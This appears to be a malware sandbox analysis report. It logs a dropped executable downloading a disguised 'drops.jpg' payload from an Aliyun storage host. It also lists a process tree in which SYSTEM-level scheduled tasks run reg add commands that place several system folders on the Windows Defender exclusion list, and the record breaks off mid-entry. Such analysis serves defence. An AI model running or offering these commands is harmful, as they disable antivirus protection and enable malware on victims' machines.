%0uLbp--52ubp%0_D+$)Kg#+_kXk#ka\|hP=TgXggd.ep````ep.epg``el.epa```e-XT_g,'etmm#___g\X+Tp2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49850	118.178.60.9	443	6808	C:\Users\user\Documents\WchJz1.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 14:13:46 UTC	114	OUT	GET /drops.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2024-12-24 14:13:46 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Tue, 24 Dec 2024 14:13:46 GMT Content-Type: image/jpeg Content-Length: 37274 Connection: close x-oss-request-id: 676AC19A482D373135BB39E8 Accept-Ranges: bytes ETag: "6D4DEB9526F3973DE0F9DCE9392F8EA7" Last-Modified: Wed, 23 Oct 2024 04:47:27 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 9193697774326766004 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: bU3rlSbzlz3g+dzpOS+Opw== x-oss-server-time: 15
2024-12-24 14:13:46 UTC	3550	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 9d 0b f8 6e e5 94 c0 97 91 14 26 45 21 4a 7f 25 4d 17 94 22 b9 cc 39 85 12 8d 90 2e 22 a7 9b 88 48 11 a9 4c 87 92 90 a4 d1 4c 49 3a 88 29 a1 90 4b 37 c2 14 21 83 34 51 f8 1f f7 7b ee cc 64 cc cc fe b5 ff 5b df f9 e6 fb fe df 5a 7b bf b7 ef db eb f7 3c eb 79 3c 39 ff 6f af fd ee 77 af fd be eb 5d 17 11 c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 cc 1a 95 ac 33 25 b2 46 a4 31 70 9c de 72 44 25 ff 3b 25 72 44 a4 31 70 9c de e2 06 c0 71 7a 8c 1b 00 c7 e9 31 Data Ascii: PNGIHDR\rfpHYs IDATxn&E!J%M"9."HLLI:)K7!4Q{d[Z{<y<9ow]qqqqqqqqqqqqqqqqq3%F1prD%;%rD1pqz1
2024-12-24 14:13:46 UTC	4096	IN	Data Raw: 83 b8 15 4d f0 da 0b 73 29 d8 06 f6 9f 9a 49 70 40 2e 05 0b 01 87 5f 9b 3d 3f fb 46 f6 f7 6d f6 f6 a1 c1 89 8a 9f a0 4d d0 15 3e 81 52 1c 83 39 a1 dc d8 a4 b1 fa 64 36 ed 8c e0 b1 d4 38 8c b0 7a eb 66 d2 b1 04 38 ea 6b e3 ed c7 43 bf 5d 06 7d 27 41 5d 01 4b 93 95 46 38 1d 28 e9 88 30 07 7c dd 35 db 80 d2 93 d3 6e 43 db 93 ed f2 5c 0a 16 82 a5 2d 59 23 ef 97 b2 7d 26 78 b5 3f 28 f6 fb 7a 57 0e 65 0b 82 17 5b 53 7b f0 79 b9 14 b4 a0 ad c2 72 68 2e 05 0b e0 b9 62 7f 49 e8 29 37 0d b5 09 f0 0d d0 e7 ce 7a 7f 7d df 0e 5e 2d 93 c7 e8 b2 6c da 29 21 c0 42 13 40 32 75 5e cd 80 10 db 6f e9 43 c0 76 ea a8 2c 9a 76 83 c0 2a 4b ec 00 01 61 a5 e5 0e a4 84 90 df 49 63 c4 b6 79 52 ad 81 ac 68 3b ec 7c 36 97 82 05 40 a5 18 cb 97 71 1a 5f fe 06 8c 80 e5 5e 2f cd a3 66 11 Data Ascii: Ms)Ip@._=?FmM>R9d68zf8kC]}'A]KF8(0\|5nC\-Y#}&x?(zWe[S{yrh.bI)7z}^-l)!B@2u^oCv,v*KaIcyRh;\|6@q_^/f
2024-12-24 14:13:47 UTC	4096	IN	Data Raw: eb d0 62 92 23 02 8f d8 7f 4b bb b9 f3 33 e8 e8 18 58 21 b6 49 77 40 06 1d 49 05 fd 8a 51 4f 8d b0 a7 bd 48 ea b2 d6 31 a1 a4 5b a8 ba 8e 83 f2 1b b1 75 d9 0d 05 45 38 2d 4d 44 3c 3c bc 50 38 4a b3 4c b8 f7 e5 51 53 4e 37 e8 d8 46 62 27 2f 59 92 6b ac 92 2b 02 ef 30 83 8e 18 8b 99 af dc 3b 6d 6c 22 f5 17 44 fb 10 73 ed e7 ac f9 08 7d 33 00 48 ae 08 bc 8b 0c 3a d2 fd b7 34 1f 4c 6f a1 21 c4 e7 45 ff f0 08 f5 dd 21 83 9e d6 7c 84 be 1a 80 5c 11 78 d6 50 e1 7f ce a0 a3 33 82 53 c5 36 c1 5e 9e 41 47 1c 74 57 18 f5 ec ab 01 40 7e 5a c9 7d 22 df c7 28 1e 2b b6 c8 d1 7d 32 e8 e8 0c f0 64 b1 2d a9 2f 93 3c 51 5d c7 19 74 ec da 9c 72 16 0c 00 42 6f be 1c 11 91 96 f6 75 d4 1d dc 28 83 8e 8e d4 c7 50 3f 13 db a4 3a 53 d2 3b 99 c8 2c fc b3 41 c7 fd a5 3e 9a c4 68 7c Data Ascii: b#K3X!Iw@IQOH1[uE8-MD<<P8JLQSN7Fb'/Yk+0;ml"Ds}3H:4Lo!E!\|\xP3S6^AGtW@~Z}"(+}2d-/<Q]trBou(P?:S;,A>h\|
2024-12-24 14:13:47 UTC	4096	IN	Data Raw: f9 72 b8 f8 65 fd f3 08 c8 16 67 54 0d cf 0b 6c 41 02 c8 a0 55 06 c4 14 75 72 5c ea 55 d3 97 57 dd f2 5b 5c 5d 16 d4 24 45 4a 6c da 65 e3 a7 67 ed f2 6b 6c 6d 26 e4 34 55 52 7c ca 75 f5 8f 39 05 67 33 f7 39 5a 5f 8f 3f 82 00 7c df f9 97 c0 02 ce af ac 82 30 8f 13 59 b2 1a 90 b1 7d 9c d0 12 de bf bc 92 20 9f 29 a5 86 eb 2f e1 82 8f a7 17 aa 28 54 ec d2 b1 f8 3a f6 97 9c ba 08 b7 3b 41 e0 c4 ad f5 35 fb e4 e9 cd 7d c4 46 0e e7 41 8d ee cf 27 c1 86 44 94 f5 fa dc 6a d5 5f 93 fc dd d5 6d d8 f9 d1 69 ac c5 e6 d8 25 90 f9 af 63 ad ce cb a4 12 2e a7 79 b5 d6 d3 bc 7e b2 d3 d0 b1 05 3b b4 74 ba db 28 e8 4a fc fb fa 4e 8c 4c 2d 2a 04 b2 0d 8d f7 51 6d 0c 5b 9f 51 32 37 17 a7 1a 98 e4 47 61 0e 68 aa 66 07 04 2a 98 27 ab e1 0a a2 68 09 26 c4 3c 79 b9 77 10 15 39 89 Data Ascii: regTlAUur\UW[\]$EJlegklm&4UR\|u9g39Z_?\|0Y} )/(T:;A5}FA'Dj_mi%c.y~;t(JNL-Qm[Q27Gahf'h&<yw9
2024-12-24 14:13:47 UTC	4096	IN	Data Raw: 1d 8a 3b 3c 3d ae 77 c1 85 4a 42 44 45 85 8b 84 85 86 87 80 81 82 83 18 d0 be db 56 55 56 91 1c 7d 2a 68 9a 19 7a 2e 56 a7 26 47 16 55 a0 23 4c 1a 1e ad 28 49 1a 1d b6 35 56 06 15 b3 32 53 0e 00 bc 3f 58 0a 50 b9 c4 a5 fa e6 42 c1 a2 fe f0 4f ce af f6 e8 48 cb b4 ea 92 55 d0 b1 d6 a4 5e dd be da aa 5b da bb e2 91 64 e7 80 e6 d5 61 ec 8d ee cf 6a e9 8a ea 9e 77 f6 97 f2 d0 70 f3 9c fe c2 7d f8 99 f6 da 06 85 e6 8a c4 03 42 e3 48 c9 ca cb ff 0b 4a eb 51 d1 d2 d3 e2 13 52 f3 5a d9 da db ec 1b 5a fb 63 e1 e2 e3 97 23 62 c3 6c e9 ea eb 8d 2b 6a cb 75 f1 f2 f3 92 33 72 d3 7e f9 fa fb 99 3b 7a db 87 01 02 03 2a c3 82 23 80 09 0a 0b 69 cb 8a 2b 99 11 12 13 6c d3 92 33 92 19 1a 1b 79 db 9a 3b ab 21 22 23 24 e3 62 03 08 42 ec 6f 08 0c 4b e9 74 15 10 41 f2 71 12 14 Data Ascii: ;<=wJBDEVUV}hz.V&GU#L(I5V2S?XPBOHU^[dajwp}BHJQRZZc#bl+ju3r~;z#i+l3y;!"#$bBoKtAq
2024-12-24 14:13:47 UTC	4096	IN	Data Raw: b2 3e 1f 74 b6 72 1b 60 09 41 8b 0c ce 87 0f c3 45 6e 03 c7 19 6a 67 18 52 83 1b df 9f 59 e1 51 d1 52 b0 f0 15 d5 5b 44 29 e9 2f 40 45 2e 64 a0 21 e1 aa aa 6d 6e 27 fb 35 56 53 3c f6 b2 6f bb b5 b6 b7 b0 b1 b2 b3 c8 08 d6 a7 94 cd 0f cb ac 81 c2 08 60 95 c6 04 d4 b5 b2 db 1d 91 b2 df 13 dd be b3 d4 14 da bb a8 e9 29 a7 80 aa 18 a7 2d 69 de a6 e4 26 aa 8b f8 4e 72 fb 3d b1 92 5c 50 f1 31 bf 98 f5 35 f3 e4 c9 cd 75 cd 4d ce 8f 43 cd ee 83 33 0d 86 46 d4 f5 9a 58 90 f1 de 9f 27 19 92 52 98 f9 d6 97 6b a5 c6 eb eb 5b e6 62 28 9c 24 a3 67 e9 ca 29 f0 f1 ba 78 b0 d1 d6 bf 7b 3d e2 38 30 31 32 33 44 88 46 27 1c 4d 8f 53 2c 19 42 82 40 29 06 47 93 fd 3a 5b 9f 51 32 2f 50 90 5e 3f 0c 55 95 5b 04 11 6a aa 60 01 2e ac 6c 0d 6a a2 28 09 a5 6b 14 71 cd fb bd 71 12 77 Data Ascii: >tr`AEnjgRYQR[D)/@E.d!mn'5VS<o`)-i&Nr=\P15uMC3FX'Rk[b($g)x{=80123DF'MS,B@)G:[Q2/P^?U[j`.lj(kqqw
2024-12-24 14:13:47 UTC	4096	IN	Data Raw: 7d 1e 63 74 b0 aa 1b c8 41 42 43 0c c8 4b e2 8d b6 b5 a3 1c 82 b1 b0 18 d8 16 77 34 1d 91 13 7c 69 5a 5b 5c 5d 99 1b 44 49 e2 63 64 65 a1 23 4c 49 68 6b 6c 6d 2b 5c b9 34 41 b3 ce 75 76 77 38 31 f1 f7 58 cd 7e 7f 80 7e d6 a7 d4 cd 0f c3 ac c1 c2 08 f0 a9 c6 70 e4 a0 da 54 d0 b1 b6 97 98 99 9a d7 11 d1 ba df e4 2a 26 87 64 a5 a6 a7 e0 22 3e 8f 14 ad ae af f8 3a fe 97 fc 4a e2 93 e0 f1 31 f7 98 f5 41 eb e4 a1 52 8b 45 01 6e c7 c8 c9 09 07 00 01 02 03 98 58 9e f7 dc 9d 55 3b f0 91 51 9f f8 ed 96 56 a4 c5 f2 ab 23 e1 c2 18 17 16 15 a3 13 e9 ca a7 7b b5 d6 e3 bc 7e fa d3 78 c5 f2 fb 89 10 b6 74 04 25 4a 8a 40 21 0e 4f 8b 75 2e 03 0c 78 0c e4 3d 59 99 57 30 1d 5e 9c 54 3d 2a 53 1f d5 56 94 e1 2e 9c 63 db a6 de 7b 5d 3d 62 a0 68 09 26 67 bb 7d 16 03 7c 36 fe 7f Data Ascii: }ctABCKw4\|iZ[\]DIcde#LIhklm+\4Auvw81X~~pT&d">:J1AREnXU;QV#{~xt%J@!Ou.x=YW0^T=SV.c{]=bh&g}\|6
2024-12-24 14:13:47 UTC	4096	IN	Data Raw: 7d 1e 03 74 be fe 27 01 f9 46 43 44 45 0e cc 98 01 c7 c7 68 a5 4e 4f 50 b9 f8 b3 ab aa 1e dc 1c 7d 62 13 df 9d 42 1e d8 69 62 63 64 2d ed b7 20 e2 e6 4f 7c 6c 6e 6f 98 fa 92 8c 8b 3d fd f3 5c 19 7b 7b 7c 35 f5 f3 a4 c9 83 83 84 cd 0f 8f c0 02 0e af ec 8c 8e 8f 1b 1d b6 77 94 95 96 1e d0 91 d2 10 18 b9 fe 9e a0 a1 ea 28 28 81 a6 a6 a8 a9 e2 22 e4 bd e6 24 34 95 d2 b2 b4 b5 3d 3b 9c 51 ba bb bc 34 f6 a7 88 4a 46 e7 a4 c4 c6 c7 80 42 46 ef dc cc ce cf 98 58 9a f3 9c 5e 52 f3 b8 d8 da db 94 5c 1a 87 e1 e1 e2 20 28 29 2a 2b 24 25 26 27 20 21 22 23 b8 78 be d7 fc bd 7d b3 dc f1 b2 70 fc b5 3f 1f 15 49 89 4f 20 0d 4e 8c 01 41 39 c3 44 86 cf 47 9b 5d 36 1b 5c 9c 17 5f 93 5d 3e 13 54 96 1e 57 e1 c9 01 6b af 69 02 2f 60 a2 23 63 1f e5 66 a4 f1 79 b9 7f 10 3d 7e be Data Ascii: }t'FCDEhNOP}bBibcd- O\|lno=\{{\|5w(("$4=;Q4JFBFX^R\ ()*+$%&' !"#x}p?IO NA9DG]6\_]>TWki/`#cfy=~
2024-12-24 14:13:47 UTC	4096	IN	Data Raw: 39 3a 5e fa b9 1a 89 40 41 42 20 82 c1 62 f0 48 49 4a 3f 8a c9 6a f7 50 51 52 3c 92 d1 72 ee 58 59 5a 29 9a d9 7a e5 60 61 62 1a a2 e1 42 dc 68 69 6a 2a aa e9 4a d3 70 71 72 73 3c f8 e2 53 d0 79 7a 7b 34 f0 73 12 25 7e 7d 6b 9c 2a 79 78 c0 00 0e af a4 8f 8e 8f d8 1c 1e b7 c4 a7 96 97 67 0d be b3 9e 9d 9e d7 2d 2d 86 ff 91 a5 a6 4f 1c a4 aa ab e4 20 22 8b d0 87 b2 b3 5c 12 bb b7 b8 f1 37 37 98 d9 89 bf c0 29 58 ce c4 c5 8e 4a 44 ed a2 f3 cc cd 26 42 dd d1 d2 9b 59 59 f2 8b ed d9 da 33 2c d4 de df 26 65 c6 63 e4 e5 e6 a0 2e 6d ce 6a ec ed ee 8a 36 75 d6 71 f4 f5 f6 83 3e 7d de 78 fc fd fe af c6 85 26 87 04 05 06 75 ce 8d 2e 8e 0c 0d 0e 60 d6 95 36 95 14 15 16 74 de 9d 3e 9c 1c 1d 1e 7a e6 a5 06 ab 24 25 26 54 ee ad 0e a2 2c 2d 2e 5c f6 b5 16 b9 34 35 36 7f Data Ascii: 9:^@AB bHIJ?jPQR<rXYZ)z`abBhijJpqrs<Syz{4s%~}kyxg--O "\77)XJD&BYY3,&ec.mj6uq>}x&u.`6t>z$%&T,-.\456
2024-12-24 14:13:47 UTC	956	IN	Data Raw: b0 66 1f 34 70 0d e4 0c cc 16 67 5c 09 6d 97 05 46 08 98 29 01 c5 53 75 41 52 53 54 18 6d 84 2b 4f 3c 1a dd bf 5e af 2d ec f9 63 94 9a 99 26 ae 6a 6a 26 57 be 1b 9f 3c fa 66 57 38 fe 2a 53 70 31 f9 bf 6c be b2 b3 81 86 80 83 83 84 af 87 89 80 8b 8b 85 af 8e 8f 91 9c 93 93 99 d7 96 97 99 94 9b 9b 91 5f 9e 9f a1 ab a1 a3 ae 67 a0 d7 ad c9 aa ab ad a3 af af be 13 b2 b3 b5 bb b7 b7 b6 9b ba bb bd b1 bc bf cc c0 ff c3 c5 c2 c4 c7 cf c8 dd cb cd c4 cf cf d9 13 d2 d3 d5 d1 d7 d7 dc 3b da db dd d9 df df e4 23 e2 e3 e5 ee e4 e7 e3 e8 cb eb ed ea ec ef f7 f0 a3 f3 f5 e4 f4 f7 e9 f8 df fb fd f0 ff ff 0d 63 02 03 05 02 04 07 0f 08 21 0b 0d 09 0f 0f 14 b3 12 13 15 06 17 17 0b 3b 1a 1b 1d 0e 1f 1f 33 63 22 23 25 2b 27 27 26 6b 2a 2b 2d 23 2f 2f 3e 53 32 33 35 2d 37 37 Data Ascii: f4pg\mF)SuARSTm+O<^-c&jj&W<fW8Sp1l_g;#c!;3c"#%+''&k+-#//>S235-77

Target ID:	0
Start time:	09:11:58
Start date:	24/12/2024
Path:	C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe"
Imagebase:	0x140000000
File size:	210'432 bytes
MD5 hash:	1268F9114CA93E5356A1C1ED706336C6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:12:43
Start date:	24/12/2024
Path:	C:\Users\user\Documents\WchJz1.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\WchJz1.exe
Imagebase:	0x140000000
File size:	133'136 bytes
MD5 hash:	D3709B25AFD8AC9B63CBD4E1E1D962B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:12:45
Start date:	24/12/2024
Path:	C:\Users\user\Documents\WchJz1.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\WchJz1.exe
Imagebase:	0x140000000
File size:	133'136 bytes
MD5 hash:	D3709B25AFD8AC9B63CBD4E1E1D962B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	09:12:56
Start date:	24/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff7ce540000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:12:56
Start date:	24/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:12:56
Start date:	24/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	true
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Imagebase:	0x800000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	09:12:56
Start date:	24/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:12:56
Start date:	24/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff7ce540000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	09:12:56
Start date:	24/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	09:12:56
Start date:	24/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	09:12:56
Start date:	24/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff711d90000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	09:12:57
Start date:	24/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff7ce540000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	09:12:57
Start date:	24/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	09:12:57
Start date:	24/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	09:12:57
Start date:	24/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	09:12:57
Start date:	24/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff7ce540000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	09:12:57
Start date:	24/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	09:12:57
Start date:	24/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	09:12:57
Start date:	24/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff711d90000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	09:12:58
Start date:	24/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff7ce540000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	09:12:58
Start date:	24/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	09:12:58
Start date:	24/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	09:12:58
Start date:	24/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	09:12:58
Start date:	24/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff71e800000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	09:12:58
Start date:	24/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	09:12:58
Start date:	24/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	09:12:58
Start date:	24/12/2024
Path:	C:\Windows\System32\reg.exe
